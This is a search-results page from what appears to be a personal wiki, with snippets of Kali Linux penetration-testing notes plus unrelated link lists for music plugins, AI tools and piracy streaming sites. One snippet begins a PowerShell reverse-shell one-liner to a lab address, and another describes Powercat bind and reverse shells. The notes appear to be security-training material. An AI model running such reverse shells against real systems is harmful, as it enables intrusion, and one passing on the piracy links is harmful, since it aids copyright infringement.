Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

84 total results found

URLs

Let's get started

Documentations As a full-blown operating system, Kali Linux offers many features and capabilities that we can not fully explore in this course. However, there are several official Kali Linux resources available for further research and study: The Kali Linux ...

Filesystem

Let's get started

The Linux Filesystem The directories you will find most useful are: /bin - basic programs (ls, cd, cat, etc.) /sbin - system programs (fdisk, mkfs, sysctl, etc) /etc - configuration files /tmp - temporary files (typically deleted on boot) /usr/bi...

Commands

Let's get started

man However, if we use the -k option with man, we can perform a keyword search as shown below:man -k passwd We can further narrow the search with the help of a regular expression:man -k '^passwd$'   apropos With the apropos3 command, we can search the l...

SSH

Let's get started

When the command completes successfully, it does not return any output but we can verify that the SSH service is running and listening on TCP port 22 by using the ss command and piping the output into grep to search the output for "sshd":  

APT Packages

Let's get started

apt-cache search and apt show The apt-cache search command displays much of the information stored in the internal cached package database. For example, let's say we would like to install the pure-ftpd application via APT. The first thing we have to do is to ...

Command Line Fun

Let's get started

Environment Variables echo $PATH   export b=10.11.1.220ping -c 2 $b There are many other environment variables defined by default in Kali Linux. We can view these by running env at the command line:   Bash History While working on a penetration te...

Recon

Pentest Mindset

As a penetration tester, one of the first things to check after obtaining remote access to a system is to understand what software is currently running on the compromised machine. This could help us elevate our privileges or collect additional information in o...

Socat

Let's get started

https://www.redhat.com/sysadmin/getting-started-socat Netcat vs Socat First, let's connect to a remote server on port 80 using both Netcat and socat: kali@kali:~$ nc <remote server's ip address> 80 kali@kali:~$ socat - TCP4:<remote server's ip address>:8...

Powershell

Let's get started

In this section, we will leverage PowerShell one-liners to execute shells, beginning with a reverse shell. $client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $str...

Powercat

Let's get started

Powercat1 is essentially the PowerShell version of Netcat written by besimorhino.2 It is a script we can download to a Windows host to leverage the strengths of PowerShell and simplifies the creation of bind/reverse shells. Powercat can be installed in Kali w...

TCPdump

Let's get started

Tcpdump Tcpdump1 is a text-based network sniffer that is streamlined, powerful, and flexible despite the lack of a graphical interface. It is by far the most commonly-used command-line packet analyzer and can be found on most Unix and Linux operating systems,...

Plugins

Plugins

VCV Rack https://vcvrack.com/ Rave Generator https://studioslave.com/free-plugin-rave-generator-2-from-wavosaur/ Magenta https://magenta.tensorflow.org/studio/ableton-live/ Vital https://vital.audio/   Kilohearts Essentials https://ki...

Samples

Tips & Tricks

Electronic Samples (Julian Earle) https://electronicsamples.com/home Looperman https://www.looperman.com/ Youtube Downloader https://yt5s.com Insert in the URL 5s at the end: Splice https://splice.com/

Useful Links

Tips & Tricks

LALALA AI https://www.lalal.ai/   Basic Pitch https://basicpitch.spotify.com/   Novation Tutorial https://components.novationmusic.com/

Links

AI Writing

Free AI Logic Balls https://logicballs.com/   Copy AI https://www.copy.ai   Premium Content Jasper AI https://www.jasper.ai/   Craftly AI https://www.craftly.ai/   Hypotenuse AI https://www.hypotenuse.ai/   Rytr https://rytr.me/ ...

Links

AI Creative

Studio ID https://studio.d-id.com/ Create professional videos using just a still image with text or audio powered by AI.   Midjourney https://www.midjourney.com/    

Links

AI Business

Validator AI https://validatorai.com/    

Series

Streaming

https://www.watchseriesz.com/ https://watchdocumentaries.com/  

Movies

Streaming

https://www.lookmovie2.to/ https://1hd.to/ For movies in english:https://dopebox.to/ https://github.com/Igglybuff/awesome-piracy  

Overview

Servarr Streaming

Looking from top down: Prowlarr:Is basically the indexer which is crawling in the internet and searching for the requested torrent files. It's the management of both Torrent Trackers and Usenet Indexers Radarr:Is a movie collection manager for Usenet and...